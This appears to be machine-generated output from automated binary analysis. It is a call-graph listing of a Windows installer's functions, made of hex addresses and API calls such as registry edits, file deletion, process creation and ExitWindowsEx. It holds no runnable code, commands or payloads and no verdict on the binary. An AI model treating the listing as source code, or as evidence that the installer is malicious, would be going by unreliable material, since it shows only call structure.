3966->3968 3967->3968 3969 404b07 3967->3969 3968->3954 3969->3966 3982 4060d4 lstrcpynA 3970->3982 3972 404b3e 3983 406032 wsprintfA 3972->3983 3974 404b48 3975 40140b 2 API calls 3974->3975 3976 404b51 3975->3976 3984 4060d4 lstrcpynA 3976->3984 3978 404b58 3978->3956 3985 4049a1 3979->3985 3981 404a7b 3981->3934 3982->3972 3983->3974 3984->3978 3986 4049b7 3985->3986 3987 406167 17 API calls 3986->3987 3988 404a1b 3987->3988 3989 406167 17 API calls 3988->3989 3990 404a26 3989->3990 3991 406167 17 API calls 3990->3991 3992 404a3c lstrlenA wsprintfA SetDlgItemTextA 3991->3992 3992->3981 3993 401a5e 3994 402bac 17 API calls 3993->3994 3995 401a67 3994->3995 3996 402bac 17 API calls 3995->3996 3997 401a0e 3996->3997 3998 4029de 3999 4064dd 5 API calls 3998->3999 4000 4029e5 3999->4000 4001 402bce 17 API calls 4000->4001 4002 4029ee 4001->4002 4003 402a2a 4002->4003 4008 406127 4002->4008 4005 4029fc 4005->4003 4012 406111 4005->4012 4010 406132 4008->4010 4009 406155 IIDFromString 4009->4005 4010->4009 4011 40614e 4010->4011 4011->4005 4015 4060f6 WideCharToMultiByte 4012->4015 4014 402a1d CoTaskMemFree 4014->4003 4015->4014 4016 4027df 4017 402bce 17 API calls 4016->4017 4019 4027ed 4017->4019 4018 402803 4021 405c48 2 API calls 4018->4021 4019->4018 4020 402bce 17 API calls 4019->4020 4020->4018 4022 402809 4021->4022 4044 405c6d GetFileAttributesA CreateFileA 4022->4044 4024 402816 4025 402822 GlobalAlloc 4024->4025 4026 4028bf 4024->4026 4029 4028b6 CloseHandle 4025->4029 4030 40283b 4025->4030 4027 4028c7 DeleteFileA 4026->4027 4028 4028da 4026->4028 4027->4028 4029->4026 4045 4032dd SetFilePointer 4030->4045 4032 402841 4033 4032c7 ReadFile 4032->4033 4034 40284a GlobalAlloc 4033->4034 4035 402894 4034->4035 4036 40285a 4034->4036 4038 405d14 WriteFile 4035->4038 4037 4030d8 31 API calls 4036->4037 4039 402867 4037->4039 4040 4028a0 GlobalFree 4038->4040 4042 40288b GlobalFree 4039->4042 4041 4030d8 31 API calls 4040->4041 4043 4028b3 4041->4043 4042->4035 4043->4029 4044->4024 4045->4032 3004 4023e0 3011 402bce 3004->3011 3007 402bce 17 API calls 3008 4023fa 3007->3008 3009 402bce 17 API calls 3008->3009 3010 402404 GetPrivateProfileStringA 3009->3010 3012 402bda 3011->3012 3017 406167 3012->3017 3015 4023f1 3015->3007 3022 406174 3017->3022 3018 406396 3019 402bfb 3018->3019 3050 4060d4 lstrcpynA 3018->3050 3019->3015 3034 4063af 3019->3034 3021 406370 lstrlenA 3021->3022 3022->3018 3022->3021 3023 406167 10 API calls 3022->3023 3026 40628c GetSystemDirectoryA 3022->3026 3028 40629f GetWindowsDirectoryA 3022->3028 3029 4063af 5 API calls 3022->3029 3030 406167 10 API calls 3022->3030 3031 406319 lstrcatA 3022->3031 3032 4062d3 SHGetSpecialFolderLocation 3022->3032 3043 405fbb 3022->3043 3048 406032 wsprintfA 3022->3048 3049 4060d4 lstrcpynA 3022->3049 3023->3021 3026->3022 3028->3022 3029->3022 3030->3022 3031->3022 3032->3022 3033 4062eb SHGetPathFromIDListA CoTaskMemFree 3032->3033 3033->3022 3040 4063bb 3034->3040 3035 406423 3036 406427 CharPrevA 3035->3036 3038 406442 3035->3038 3036->3035 3037 406418 CharNextA 3037->3035 3037->3040 3038->3015 3040->3035 3040->3037 3041 406406 CharNextA 3040->3041 3042 406413 CharNextA 3040->3042 3055 405a97 3040->3055 3041->3040 3042->3037 3051 405f5a 3043->3051 3046 405fef RegQueryValueExA RegCloseKey 3047 40601e 3046->3047 3047->3022 3048->3022 3049->3022 3050->3019 3052 405f69 3051->3052 3053 405f72 RegOpenKeyExA 3052->3053 3054 405f6d 3052->3054 3053->3054 3054->3046 3054->3047 3056 405a9d 3055->3056 3057 405ab0 3056->3057 3058 405aa3 CharNextA 3056->3058 3057->3040 3058->3056 4046 4028e0 4047 402bac 17 API calls 4046->4047 4048 4028e6 4047->4048 4049 402925 4048->4049 4050 40290e 4048->4050 4057 4027bf 4048->4057 4053 40293f 4049->4053 4054 40292f 4049->4054 4051 402922 4050->4051 4052 402913 4050->4052 4051->4057 4061 406032 wsprintfA 4051->4061 4060 4060d4 lstrcpynA 4052->4060 4056 406167 17 API calls 4053->4056 4055 402bac 17 API calls 4054->4055 4055->4051 4056->4051 4060->4057 4061->4057 4062 401563 4063 401569 4062->4063 4066 406032 wsprintfA 4063->4066 4065 4029aa 4066->4065 4067 401b63 4068 402bce 17 API calls 4067->4068 4069 401b6a 4068->4069 4070 402bac 17 API calls 4069->4070 4071 401b73 wsprintfA 4070->4071 4072 402a5a 4071->4072 4073 401d65 4074 401d78 GetDlgItem 4073->4074 4075 401d6b 4073->4075 4077 401d72 4074->4077 4076 402bac 17 API calls 4075->4076 4076->4077 4078 401db9 GetClientRect LoadImageA SendMessageA 4077->4078 4080 402bce 17 API calls 4077->4080 4081 401e1a 4078->4081 4083 401e26 4078->4083 4080->4078 4082 401e1f DeleteObject 4081->4082 4081->4083 4082->4083 4084 40166a 4085 402bce 17 API calls 4084->4085 4086 401671 4085->4086 4087 402bce 17 API calls 4086->4087 4088 40167a 4087->4088 4089 402bce 17 API calls 4088->4089 4090 401683 MoveFileA 4089->4090 4091 401696 4090->4091 4092 40168f 4090->4092 4093 406448 2 API calls 4091->4093 4096 4022e2 4091->4096 4094 401423 24 API calls 4092->4094 4095 4016a5 4093->4095 4094->4096 4095->4096 4097 405eb3 36 API calls 4095->4097 4097->4092 4098 4045ea 4099 404616 4098->4099 4100 404627 4098->4100 4159 4057d4 GetDlgItemTextA 4099->4159 4101 404633 GetDlgItem 4100->4101 4108 404692 4100->4108 4103 404647 4101->4103 4107 40465b SetWindowTextA 4103->4107 4111 405b05 4 API calls 4103->4111 4104 404776 4157 404920 4104->4157 4161 4057d4 GetDlgItemTextA 4104->4161 4105 404621 4106 4063af 5 API calls 4105->4106 4106->4100 4112 404158 18 API calls 4107->4112 4108->4104 4113 406167 17 API calls 4108->4113 4108->4157 4110 4041bf 8 API calls 4115 404934 4110->4115 4116 404651 4111->4116 4117 404677 4112->4117 4118 404706 SHBrowseForFolderA 4113->4118 4114 4047a6 4119 405b5a 18 API calls 4114->4119 4116->4107 4123 405a6c 3 API calls 4116->4123 4120 404158 18 API calls 4117->4120 4118->4104 4121 40471e CoTaskMemFree 4118->4121 4122 4047ac 4119->4122 4124 404685 4120->4124 4125 405a6c 3 API calls 4121->4125 4162 4060d4 lstrcpynA 4122->4162 4123->4107 4160 40418d SendMessageA 4124->4160 4127 40472b 4125->4127 4130 404762 SetDlgItemTextA 4127->4130 4134 406167 17 API calls 4127->4134 4129 40468b 4133 4064dd 5 API calls 4129->4133 4130->4104 4131 4047c3 4132 4064dd 5 API calls 4131->4132 4135 4047ca 4132->4135 4133->4108 4136 40474a lstrcmpiA 4134->4136 4137 404806 4135->4137 4145 405ab3 2 API calls 4135->4145 4146 40485e 4135->4146 4136->4130 4138 40475b lstrcatA 4136->4138 4163 4060d4 lstrcpynA 4137->4163 4138->4130 4140 40480d 4141 405b05 4 API calls 4140->4141 4142 404813 GetDiskFreeSpaceA 4141->4142 4144 404837 MulDiv 4142->4144 4142->4146 4144->4146 4145->4135 4147 4048cf 4146->4147 4149 404a66 20 API calls 4146->4149 4148 4048f2 4147->4148 4150 40140b 2 API calls 4147->4150 4164 40417a KiUserCallbackDispatcher 4148->4164 4151 4048bc 4149->4151 4150->4148 4152 4048d1 SetDlgItemTextA 4151->4152 4153 4048c1 4151->4153 4152->4147 4155 4049a1 20 API calls 4153->4155 4155->4147 4156 40490e 4156->4157 4158 404543 SendMessageA 4156->4158 4157->4110 4158->4157 4159->4105 4160->4129 4161->4114 4162->4131 4163->4140 4164->4156 4165 40216b 4166 402bce 17 API calls 4165->4166 4167 402172 4166->4167 4168 402bce 17 API calls 4167->4168 4169 40217c 4168->4169 4170 402bce 17 API calls 4169->4170 4171 402186 4170->4171 4172 402bce 17 API calls 4171->4172 4173 402193 4172->4173 4174 402bce 17 API calls 4173->4174 4175 40219d 4174->4175 4176 4021df CoCreateInstance 4175->4176 4177 402bce 17 API calls 4175->4177 4180 4021fe 4176->4180 4182 4022ac 4176->4182 4177->4176 4178 401423 24 API calls 4179 4022e2 4178->4179 4181 40228c MultiByteToWideChar 4180->4181 4180->4182 4181->4182 4182->4178 4182->4179 4183 4022eb 4184 402bce 17 API calls 4183->4184 4185 4022f1 4184->4185 4186 402bce 17 API calls 4185->4186 4187 4022fa 4186->4187 4188 402bce 17 API calls 4187->4188 4189 402303 4188->4189 4190 406448 2 API calls 4189->4190 4191 40230c 4190->4191 4192 402310 4191->4192 4193 40231d lstrlenA lstrlenA 4191->4193 4195 4051fb 24 API calls 4192->4195 4197 402318 4192->4197 4194 4051fb 24 API calls 4193->4194 4196 402359 SHFileOperationA 4194->4196 4195->4197 4196->4192 4196->4197 4198 40236d 4199 402387 4198->4199 4200 402374 4198->4200 4201 406167 17 API calls 4200->4201 4202 402381 4201->4202 4203 4057f0 MessageBoxIndirectA 4202->4203 4203->4199 4204 40266d 4205 402bac 17 API calls 4204->4205 4207 402677 4205->4207 4206 405ce5 ReadFile 4206->4207 4207->4206 4208 4026e7 4207->4208 4210 4026f7 4207->4210 4211 4026e5 4207->4211 4213 406032 wsprintfA 4208->4213 4210->4211 4212 40270d SetFilePointer 4210->4212 4212->4211 4213->4211 4214 4019ed 4215 402bce 17 API calls 4214->4215 4216 4019f4 4215->4216 4217 402bce 17 API calls 4216->4217 4218 4019fd 4217->4218 4219 401a04 lstrcmpiA 4218->4219 4220 401a16 lstrcmpA 4218->4220 4221 401a0a 4219->4221 4220->4221 4222 40296e 4223 402bac 17 API calls 4222->4223 4224 402974 4223->4224 4225 4029af 4224->4225 4226 4027bf 4224->4226 4228 402986 4224->4228 4225->4226 4227 406167 17 API calls 4225->4227 4227->4226 4228->4226 4230 406032 wsprintfA 4228->4230 4230->4226 3623 40156f 3624 401586 3623->3624 3625 40157f ShowWindow 3623->3625 3626 401594 ShowWindow 3624->3626 3627 402a5a 3624->3627 3625->3624 3626->3627 4231 40516f 4232 405193 4231->4232 4233 40517f 4231->4233 4234 40519b IsWindowVisible 4232->4234 4238 4051b2 4232->4238 4235 405185 4233->4235 4236 4051dc 4233->4236 4234->4236 4237 4051a8 4234->4237 4240 4041a4 SendMessageA 4235->4240 4239 4051e1 CallWindowProcA 4236->4239 4241 404aab 5 API calls 4237->4241 4238->4239 4243 404b2b 4 API calls 4238->4243 4242 40518f 4239->4242 4240->4242 4241->4238 4243->4236 4244 4014f4 SetForegroundWindow 4245 402a5a 4244->4245 3628 402476 3629 402bce 17 API calls 3628->3629 3630 402488 3629->3630 3631 402bce 17 API calls 3630->3631 3632 402492 3631->3632 3645 402c5e 3632->3645 3635 402a5a 3636 4024c7 3638 4024d3 3636->3638 3640 402bac 17 API calls 3636->3640 3637 402bce 17 API calls 3639 4024c0 lstrlenA 3637->3639 3641 4024f5 RegSetValueExA 3638->3641 3642 4030d8 31 API calls 3638->3642 3639->3636 3640->3638 3643 40250b RegCloseKey 3641->3643 3642->3641 3643->3635 3646 402c79 3645->3646 3649 405f88 3646->3649 3650 405f97 3649->3650 3651 405fa2 RegCreateKeyExA 3650->3651 3652 4024a2 3650->3652 3651->3652 3652->3635 3652->3636 3652->3637 4246 402777 4247 40277d 4246->4247 4248 402781 FindNextFileA 4247->4248 4251 402793 4247->4251 4249 4027d2 4248->4249 4248->4251 4252 4060d4 lstrcpynA 4249->4252 4252->4251 4253 401ef9 4254 402bce 17 API calls 4253->4254 4255 401eff 4254->4255 4256 402bce 17 API calls 4255->4256 4257 401f08 4256->4257 4258 402bce 17 API calls 4257->4258 4259 401f11 4258->4259 4260 402bce 17 API calls 4259->4260 4261 401f1a 4260->4261 4262 401423 24 API calls 4261->4262 4263 401f21 4262->4263 4270 4057b6 ShellExecuteExA 4263->4270 4265 401f5c 4266 406552 5 API calls 4265->4266 4268 4027bf 4265->4268 4267 401f76 CloseHandle 4266->4267 4267->4268 4270->4265 3756 401f7b 3757 402bce 17 API calls 3756->3757 3758 401f81 3757->3758 3759 4051fb 24 API calls 3758->3759 3760 401f8b 3759->3760 3761 405773 2 API calls 3760->3761 3762 401f91 3761->3762 3763 401fb2 CloseHandle 3762->3763 3767 4027bf 3762->3767 3771 406552 WaitForSingleObject 3762->3771 3763->3767 3766 401fa6 3768 401fb4 3766->3768 3769 401fab 3766->3769 3768->3763 3776 406032 wsprintfA 3769->3776 3772 40656c 3771->3772 3773 40657e GetExitCodeProcess 3772->3773 3774 406519 2 API calls 3772->3774 3773->3766 3775 406573 WaitForSingleObject 3774->3775 3775->3772 3776->3763 4271 401ffb 4272 402bce 17 API calls 4271->4272 4273 402002 4272->4273 4274 4064dd 5 API calls 4273->4274 4275 402011 4274->4275 4276 402029 GlobalAlloc 4275->4276 4277 402091 4275->4277 4276->4277 4278 40203d 4276->4278 4279 4064dd 5 API calls 4278->4279 4280 402044 4279->4280 4281 4064dd 5 API calls 4280->4281 4282 40204e 4281->4282 4282->4277 4286 406032 wsprintfA 4282->4286 4284 402085 4287 406032 wsprintfA 4284->4287 4286->4284 4287->4277 4288 4018fd 4289 401934 4288->4289 4290 402bce 17 API calls 4289->4290 4291 401939 4290->4291 4292 40589c 67 API calls 4291->4292 4293 401942 4292->4293 4294 401cfe 4295 402bac 17 API calls 4294->4295 4296 401d04 IsWindow 4295->4296 4297 401a0e 4296->4297 4298 401000 4299 401037 BeginPaint GetClientRect 4298->4299 4300 40100c DefWindowProcA 4298->4300 4301 4010f3 4299->4301 4303 401179 4300->4303 4304 401073 CreateBrushIndirect FillRect DeleteObject 4301->4304 4305 4010fc 4301->4305 4304->4301 4306 401102 CreateFontIndirectA 4305->4306 4307 401167 EndPaint 4305->4307 4306->4307 4308 401112 6 API calls 4306->4308 4307->4303 4308->4307 4309 401900 4310 402bce 17 API calls 4309->4310 4311 401907 4310->4311 4312 4057f0 MessageBoxIndirectA 4311->4312 4313 401910 4312->4313 4314 401502 4315 40150a 4314->4315 4317 40151d 4314->4317 4316 402bac 17 API calls 4315->4316 4316->4317 3059 403c84 3060 403dd7 3059->3060 3061 403c9c 3059->3061 3063 403e28 3060->3063 3064 403de8 GetDlgItem GetDlgItem 3060->3064 3061->3060 3062 403ca8 3061->3062 3066 403cb3 SetWindowPos 3062->3066 3067 403cc6 3062->3067 3065 403e82 3063->3065 3073 401389 2 API calls 3063->3073 3068 404158 18 API calls 3064->3068 3074 403dd2 3065->3074 3130 4041a4 3065->3130 3066->3067 3070 403ce3 3067->3070 3071 403ccb ShowWindow 3067->3071 3072 403e12 SetClassLongA 3068->3072 3075 403d05 3070->3075 3076 403ceb DestroyWindow 3070->3076 3071->3070 3077 40140b 2 API calls 3072->3077 3078 403e5a 3073->3078 3080 403d0a SetWindowLongA 3075->3080 3081 403d1b 3075->3081 3079 4040e1 3076->3079 3077->3063 3078->3065 3084 403e5e SendMessageA 3078->3084 3079->3074 3090 404112 ShowWindow 3079->3090 3080->3074 3082 403dc4 3081->3082 3083 403d27 GetDlgItem 3081->3083 3152 4041bf 3082->3152 3087 403d57 3083->3087 3088 403d3a SendMessageA IsWindowEnabled 3083->3088 3084->3074 3085 40140b 2 API calls 3097 403e94 3085->3097 3086 4040e3 DestroyWindow KiUserCallbackDispatcher 3086->3079 3092 403d64 3087->3092 3093 403dab SendMessageA 3087->3093 3094 403d77 3087->3094 3104 403d5c 3087->3104 3088->3074 3088->3087 3090->3074 3091 406167 17 API calls 3091->3097 3092->3093 3092->3104 3093->3082 3098 403d94 3094->3098 3099 403d7f 3094->3099 3096 403d92 3096->3082 3097->3074 3097->3085 3097->3086 3097->3091 3100 404158 18 API calls 3097->3100 3121 404023 DestroyWindow 3097->3121 3133 404158 3097->3133 3101 40140b 2 API calls 3098->3101 3146 40140b 3099->3146 3100->3097 3103 403d9b 3101->3103 3103->3082 3103->3104 3149 404131 3104->3149 3106 403f0f GetDlgItem 3107 403f24 3106->3107 3108 403f2c ShowWindow KiUserCallbackDispatcher 3106->3108 3107->3108 3136 40417a KiUserCallbackDispatcher 3108->3136 3110 403f56 EnableWindow 3115 403f6a 3110->3115 3111 403f6f GetSystemMenu EnableMenuItem SendMessageA 3112 403f9f SendMessageA 3111->3112 3111->3115 3112->3115 3115->3111 3137 40418d SendMessageA 3115->3137 3138 403c65 3115->3138 3141 4060d4 lstrcpynA 3115->3141 3117 403fce lstrlenA 3118 406167 17 API calls 3117->3118 3119 403fdf SetWindowTextA 3118->3119 3142 401389 3119->3142 3121->3079 3122 40403d CreateDialogParamA 3121->3122 3122->3079 3123 404070 3122->3123 3124 404158 18 API calls 3123->3124 3125 40407b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3124->3125 3126 401389 2 API calls 3125->3126 3127 4040c1 3126->3127 3127->3074 3128 4040c9 ShowWindow 3127->3128 3129 4041a4 SendMessageA 3128->3129 3129->3079 3131 4041bc 3130->3131 3132 4041ad SendMessageA 3130->3132 3131->3097 3132->3131 3134 406167 17 API calls 3133->3134 3135 404163 SetDlgItemTextA 3134->3135 3135->3106 3136->3110 3137->3115 3139 406167 17 API calls 3138->3139 3140 403c73 SetWindowTextA 3139->3140 3140->3115 3141->3117 3144 401390 3142->3144 3143 4013fe 3143->3097 3144->3143 3145 4013cb MulDiv SendMessageA 3144->3145 3145->3144 3147 401389 2 API calls 3146->3147 3148 401420 3147->3148 3148->3104 3150 404138 3149->3150 3151 40413e SendMessageA 3149->3151 3150->3151 3151->3096 3153 404282 3152->3153 3154 4041d7 GetWindowLongA 3152->3154 3153->3074 3154->3153 3155 4041ec 3154->3155 3155->3153 3156 404219 GetSysColor 3155->3156 3157 40421c 3155->3157 3156->3157 3158 404222 SetTextColor 3157->3158 3159 40422c SetBkMode 3157->3159 3158->3159 3160 404244 GetSysColor 3159->3160 3161 40424a 3159->3161 3160->3161 3162 404251 SetBkColor 3161->3162 3163 40425b 3161->3163 3162->3163 3163->3153 3164 404275 CreateBrushIndirect 3163->3164 3165 40426e DeleteObject 3163->3165 3164->3153 3165->3164 4318 402604 4319 402bce 17 API calls 4318->4319 4320 40260b 4319->4320 4323 405c6d GetFileAttributesA CreateFileA 4320->4323 4322 402617 4323->4322 4324 401b87 4325 401b94 4324->4325 4326 401bd8 4324->4326 4331 401bab 4325->4331 4334 401c1c 4325->4334 4327 401c01 GlobalAlloc 4326->4327 4328 401bdc 4326->4328 4330 406167 17 API calls 4327->4330 4336 402387 4328->4336 4345 4060d4 lstrcpynA 4328->4345 4329 406167 17 API calls 4332 402381 4329->4332 4330->4334 4343 4060d4 lstrcpynA 4331->4343 4339 4057f0 MessageBoxIndirectA 4332->4339 4334->4329 4334->4336 4337 401bee GlobalFree 4337->4336 4338 401bba 4344 4060d4 lstrcpynA 4338->4344 4339->4336 4341 401bc9 4346 4060d4 lstrcpynA 4341->4346 4343->4338 4344->4341 4345->4337 4346->4336 3545 402588 3557 402c0e 3545->3557 3548 402bac 17 API calls 3549 40259b 3548->3549 3550 4025a9 3549->3550 3555 4027bf 3549->3555 3551 4025c2 RegEnumValueA 3550->3551 3552 4025b6 RegEnumKeyA 3550->3552 3553 4025de RegCloseKey 3551->3553 3554 4025d7 3551->3554 3552->3553 3553->3555 3554->3553 3558 402bce 17 API calls 3557->3558 3559 402c25 3558->3559 3560 405f5a RegOpenKeyExA 3559->3560 3561 402592 3560->3561 3561->3548 3562 40380d 3563 403825 3562->3563 3564 403817 CloseHandle 3562->3564 3569 403852 3563->3569 3564->3563 3570 403860 3569->3570 3571 40382a 3570->3571 3572 403865 FreeLibrary GlobalFree 3570->3572 3573 40589c 3571->3573 3572->3571 3572->3572 3574 405b5a 18 API calls 3573->3574 3575 4058bc 3574->3575 3576 4058c4 DeleteFileA 3575->3576 3577 4058db 3575->3577 3605 403836 3576->3605 3578 405a09 3577->3578 3610 4060d4 lstrcpynA 3577->3610 3583 406448 2 API calls 3578->3583 3578->3605 3580 405901 3581 405914 3580->3581 3582 405907 lstrcatA 3580->3582 3585 405ab3 2 API calls 3581->3585 3584 40591a 3582->3584 3586 405a2d 3583->3586 3587 405928 lstrcatA 3584->3587 3588 405933 lstrlenA FindFirstFileA 3584->3588 3585->3584 3589 405a6c 3 API calls 3586->3589 3586->3605 3587->3588 3588->3578 3593 405957 3588->3593 3591 405a37 3589->3591 3590 405a97 CharNextA 3590->3593 3592 405854 5 API calls 3591->3592 3594 405a43 3592->3594 3593->3590 3598 4059e8 FindNextFileA 3593->3598 3606 40589c 60 API calls 3593->3606 3607 4051fb 24 API calls 3593->3607 3608 4051fb 24 API calls 3593->3608 3609 405eb3 36 API calls 3593->3609 3611 4060d4 lstrcpynA 3593->3611 3612 405854 3593->3612 3595 405a47 3594->3595 3596 405a5d 3594->3596 3601 4051fb 24 API calls 3595->3601 3595->3605 3597 4051fb 24 API calls 3596->3597 3597->3605 3598->3593 3600 405a00 FindClose 3598->3600 3600->3578 3602 405a54 3601->3602 3604 405eb3 36 API calls 3602->3604 3604->3605 3606->3593 3607->3598 3608->3593 3609->3593 3610->3580 3611->3593 3620 405c48 GetFileAttributesA 3612->3620 3615 405881 3615->3593 3616 405877 DeleteFileA 3618 40587d 3616->3618 3617 40586f RemoveDirectoryA 3617->3618 3618->3615 3619 40588d SetFileAttributesA 3618->3619 3619->3615 3621 405860 3620->3621 3622 405c5a SetFileAttributesA 3620->3622 3621->3615 3621->3616 3621->3617 3622->3621 4347 40428e lstrcpynA lstrlenA 4348 401490 4349 4051fb 24 API calls 4348->4349 4350 401497 4349->4350 3653 402516 3654 402c0e 17 API calls 3653->3654 3655 402520 3654->3655 3656 402bce 17 API calls 3655->3656 3657 402529 3656->3657 3658 402533 RegQueryValueExA 3657->3658 3662 4027bf 3657->3662 3659 402553 3658->3659 3663 402559 RegCloseKey 3658->3663 3659->3663 3664 406032 wsprintfA 3659->3664 3663->3662 3664->3663 3801 40239c 3802 4023a4 3801->3802 3804 4023aa 3801->3804 3803 402bce 17 API calls 3802->3803 3803->3804 3805 4023ba 3804->3805 3806 402bce 17 API calls 3804->3806 3807 4023c8 3805->3807 3808 402bce 17 API calls 3805->3808 3806->3805 3809 402bce 17 API calls 3807->3809 3808->3807 3810 4023d1 WritePrivateProfileStringA 3809->3810 3811 40159d 3812 402bce 17 API calls 3811->3812 3813 4015a4 SetFileAttributesA 3812->3813 3814 4015b6 3813->3814 4351 40149d 4352 402387 4351->4352 4353 4014ab PostQuitMessage 4351->4353 4353->4352 4354 40209d 4355 40215d 4354->4355 4356 4020af 4354->4356 4358 401423 24 API calls 4355->4358 4357 402bce 17 API calls 4356->4357 4359 4020b6 4357->4359 4365 4022e2 4358->4365 4360 402bce 17 API calls 4359->4360 4361 4020bf 4360->4361 4362 4020d4 LoadLibraryExA 4361->4362 4363 4020c7 GetModuleHandleA 4361->4363 4362->4355 4364 4020e4 GetProcAddress 4362->4364 4363->4362 4363->4364 4366 402130 4364->4366 4367 4020f3 4364->4367 4368 4051fb 24 API calls 4366->4368 4369 401423 24 API calls 4367->4369 4370 402103 4367->4370 4368->4370 4369->4370 4370->4365 4371 402151 FreeLibrary 4370->4371 4371->4365 4372 401a1e 4373 402bce 17 API calls 4372->4373 4374 401a27 ExpandEnvironmentStringsA 4373->4374 4375 401a3b 4374->4375 4377 401a4e 4374->4377 4376 401a40 lstrcmpA 4375->4376 4375->4377 4376->4377 3815 40171f 3816 402bce 17 API calls 3815->3816 3817 401726 SearchPathA 3816->3817 3818 401741 3817->3818 4383 401d1f 4384 402bac 17 API calls 4383->4384 4385 401d26 4384->4385 4386 402bac 17 API calls 4385->4386 4387 401d32 GetDlgItem 4386->4387 4388 402620 4387->4388 4389 402421 4390 402453 4389->4390 4391 402428 4389->4391 4392 402bce 17 API calls 4390->4392 4393 402c0e 17 API calls 4391->4393 4395 40245a 4392->4395 4394 40242f 4393->4394 4397 402bce 17 API calls 4394->4397 4399 402467 4394->4399 4400 402c8c 4395->4400 4398 402440 RegDeleteValueA RegCloseKey 4397->4398 4398->4399 4401 402c98 4400->4401 4402 402c9f 4400->4402 4401->4399 4402->4401 4404 402cd0 4402->4404 4405 405f5a RegOpenKeyExA 4404->4405 4407 402cfe 4405->4407 4406 402da8 4406->4401 4407->4406 4408 402d0e RegEnumValueA 4407->4408 4412 402d31 4407->4412 4409 402d98 RegCloseKey 4408->4409 4408->4412 4409->4406 4410 402d6d RegEnumKeyA 4411 402d76 RegCloseKey 4410->4411 4410->4412 4413 4064dd 5 API calls 4411->4413 4412->4409 4412->4410 4412->4411 4414 402cd0 6 API calls 4412->4414 4415 402d86 4413->4415 4414->4412 4415->4406 4416 402d8a RegDeleteKeyA 4415->4416 4416->4406 4417 4027a1 4418 402bce 17 API calls 4417->4418 4419 4027a8 FindFirstFileA 4418->4419 4420 4027cb 4419->4420 4424 4027bb 4419->4424 4422 4027d2 4420->4422 4425 406032 wsprintfA 4420->4425 4426 4060d4 lstrcpynA 4422->4426 4425->4422 4426->4424 4427 4045a3 4428 4045b3 4427->4428 4429 4045d9 4427->4429 4430 404158 18 API calls 4428->4430 4431 4041bf 8 API calls 4429->4431 4432 4045c0 SetDlgItemTextA 4430->4432 4433 4045e5 4431->4433 4432->4429 3177 403325 SetErrorMode GetVersion 3178 403366 3177->3178 3179 40336c 3177->3179 3180 4064dd 5 API calls 3178->3180 3267 40646f GetSystemDirectoryA 3179->3267 3180->3179 3182 403382 lstrlenA 3182->3179 3183 403391 3182->3183 3270 4064dd GetModuleHandleA 3183->3270 3186 4064dd 5 API calls 3187 40339f 3186->3187 3188 4064dd 5 API calls 3187->3188 3189 4033ab #17 OleInitialize SHGetFileInfoA 3188->3189 3276 4060d4 lstrcpynA 3189->3276 3192 4033f7 GetCommandLineA 3277 4060d4 lstrcpynA 3192->3277 3194 403409 3195 405a97 CharNextA 3194->3195 3196 403432 CharNextA 3195->3196 3199 403442 3196->3199 3197 40350c 3198 40351f GetTempPathA 3197->3198 3278 4032f4 3198->3278 3199->3197 3199->3199 3204 405a97 CharNextA 3199->3204 3208 40350e 3199->3208 3201 403537 3202 403591 DeleteFileA 3201->3202 3203 40353b GetWindowsDirectoryA lstrcatA 3201->3203 3288 402ea1 GetTickCount GetModuleFileNameA 3202->3288 3205 4032f4 12 API calls 3203->3205 3204->3199 3207 403557 3205->3207 3207->3202 3211 40355b GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3207->3211 3372 4060d4 lstrcpynA 3208->3372 3209 4035a5 3212 40363f ExitProcess CoUninitialize 3209->3212 3216 40362b 3209->3216 3217 405a97 CharNextA 3209->3217 3215 4032f4 12 API calls 3211->3215 3213 403773 3212->3213 3214 403655 3212->3214 3219 4037f5 ExitProcess 3213->3219 3220 40377b GetCurrentProcess OpenProcessToken 3213->3220 3389 4057f0 3214->3389 3221 403589 3215->3221 3316 4038e7 3216->3316 3224 4035c0 3217->3224 3227 4037c6 3220->3227 3228 403796 LookupPrivilegeValueA AdjustTokenPrivileges 3220->3228 3221->3202 3221->3212 3223 40363b 3223->3212 3230 403606 3224->3230 3231 40366b 3224->3231 3229 4064dd 5 API calls 3227->3229 3228->3227 3232 4037cd 3229->3232 3373 405b5a 3230->3373 3393 40575b 3231->3393 3235 4037e2 ExitWindowsEx 3232->3235 3236 4037ee 3232->3236 3235->3219 3235->3236 3239 40140b 2 API calls 3236->3239 3239->3219 3240 403681 lstrcatA 3241 40368c lstrcatA lstrcmpiA 3240->3241 3241->3212 3242 4036a8 3241->3242 3244 4036b4 3242->3244 3245 4036ad 3242->3245 3401 40573e CreateDirectoryA 3244->3401 3396 4056c1 CreateDirectoryA 3245->3396 3246 403620 3388 4060d4 lstrcpynA 3246->3388 3250 4036b9 SetCurrentDirectoryA 3252 4036d3 3250->3252 3253 4036c8 3250->3253 3405 4060d4 lstrcpynA 3252->3405 3404 4060d4 lstrcpynA 3253->3404 3256 406167 17 API calls 3257 403712 DeleteFileA 3256->3257 3258 40371f CopyFileA 3257->3258 3264 4036e1 3257->3264 3258->3264 3259 403767 3260 405eb3 36 API calls 3259->3260 3262 40376e 3260->3262 3262->3212 3263 406167 17 API calls 3263->3264 3264->3256 3264->3259 3264->3263 3266 403753 CloseHandle 3264->3266 3406 405eb3 MoveFileExA 3264->3406 3410 405773 CreateProcessA 3264->3410 3266->3264 3268 406491 wsprintfA LoadLibraryExA 3267->3268 3268->3182 3271 406503 GetProcAddress 3270->3271 3272 4064f9 3270->3272 3274 403398 3271->3274 3273 40646f 3 API calls 3272->3273 3275 4064ff 3273->3275 3274->3186 3275->3271 3275->3274 3276->3192 3277->3194 3279 4063af 5 API calls 3278->3279 3280 403300 3279->3280 3281 40330a 3280->3281 3413 405a6c lstrlenA CharPrevA 3280->3413 3281->3201 3284 40573e 2 API calls 3285 403318 3284->3285 3416 405c9c 3285->3416 3420 405c6d GetFileAttributesA CreateFileA 3288->3420 3290 402ee1 3309 402ef1 3290->3309 3421 4060d4 lstrcpynA 3290->3421 3292 402f07 3422 405ab3 lstrlenA 3292->3422 3296 402f18 GetFileSize 3297 403012 3296->3297 3315 402f2f 3296->3315 3427 402e3d 3297->3427 3299 40301b 3301 40304b GlobalAlloc 3299->3301 3299->3309 3462 4032dd SetFilePointer 3299->3462 3438 4032dd SetFilePointer 3301->3438 3302 40307e 3306 402e3d 6 API calls 3302->3306 3305 403066 3439 4030d8 3305->3439 3306->3309 3307 403034 3310 4032c7 ReadFile 3307->3310 3309->3209 3312 40303f 3310->3312 3311 402e3d 6 API calls 3311->3315 3312->3301 3312->3309 